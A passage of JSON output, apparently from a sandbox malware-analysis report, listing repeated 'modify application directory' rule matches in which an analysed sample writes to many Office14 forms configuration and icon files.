[ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25000", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\activits.ico\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\ACTIVITY.CFG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\activity.cfg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25007", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\activity.cfg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\APPT.CFG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\appt.cfg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25014", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\appt.cfg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\APPTL.ICO", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\apptl.ico", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25021", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\apptl.ico\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\APPTS.ICO", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\appts.ico", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25028", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\appts.ico\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CNFNOT.CFG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\cnfnot.cfg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25035", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\cnfnot.cfg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CNFNOT.ICO", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\cnfnot.ico", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25042", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\cnfnot.ico\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CNFRES.CFG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\cnfres.cfg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25049", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\cnfres.cfg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CONFLICT.ICO", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\conflict.ico", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25056", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\conflict.ico\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CONTACT.CFG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\contact.cfg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25063", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\contact.cfg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CONTACTL.ICO", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\contactl.ico", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25070", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\contactl.ico\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CONTACTS.ICO", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\contacts.ico", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25077", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\contacts.ico\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DISTLIST.CFG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\distlist.cfg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25084", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\distlist.cfg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DISTLSTL.ICO", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\distlstl.ico", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25091", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\distlstl.ico\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DISTLSTS.ICO", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\distlsts.ico", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25098", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\distlsts.ico\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DOC.CFG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\doc.cfg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25105", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\doc.cfg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DOCL.ICO", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\docl.ico", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25112", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\docl.ico\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DOCS.ICO", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\docs.ico", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25119", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\docs.ico\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\EXITEM.CFG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\exitem.cfg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25126", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\exitem.cfg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\EXITEML.ICO", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\exiteml.ico", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25133", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\exiteml.ico\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\EXITEMS.ICO", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\exitems.ico", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25140", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\exitems.ico\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\INFOMAIL.CFG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\infomail.cfg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25147", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\infomail.cfg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\INFOML.ICO", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\infoml.ico", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25154", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\infoml.ico\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\INFOMS.ICO", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\infoms.ico", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25163", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\infoms.ico\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\IPM.CFG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\ipm.cfg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25170", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\ipm.cfg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\IPML.ICO", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\ipml.ico", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25177", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\ipml.ico\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\IPMS.ICO", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\ipms.ico", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25184", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\ipms.ico\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\MMSL.ICO", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\mmsl.ico", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25191", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\mmsl.ico\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\MMSS.ICO", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\mmss.ico", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25198", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\mmss.ico\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\NOTE.CFG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\note.cfg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25205", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\note.cfg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\NOTEL.ICO", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\notel.ico", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25212", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\notel.ico\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\NOTES.ICO", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\notes.ico", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25219", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\notes.ico\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OMSMMS.CFG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\omsmms.cfg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25226", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\omsmms.cfg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft 